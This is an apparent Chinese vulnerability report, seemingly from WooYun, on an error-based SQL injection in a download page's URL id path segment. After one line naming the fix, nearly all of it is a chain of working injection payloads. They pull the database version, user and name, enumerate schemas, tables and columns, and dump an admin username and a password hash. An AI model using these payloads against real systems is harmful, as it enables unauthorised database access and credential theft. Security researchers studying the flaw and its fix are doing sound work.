http://www.wooyun.org/bugs/wooyun-2010-01666
之前想找个测试，没想到这里有，可以测试一下，做个记录而已。从下面的请求看，注入点是 URL 路径中的 id 段：该值未经参数化直接拼入 SQL，且数据库报错被回显到页面；修复应改用参数化查询（或将 id 强制转换为整数）并关闭错误回显。
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php
或者
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test
/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
. d' \3 {; y/ x; v6a8b4574ca231eb8bd52764d4978ffcd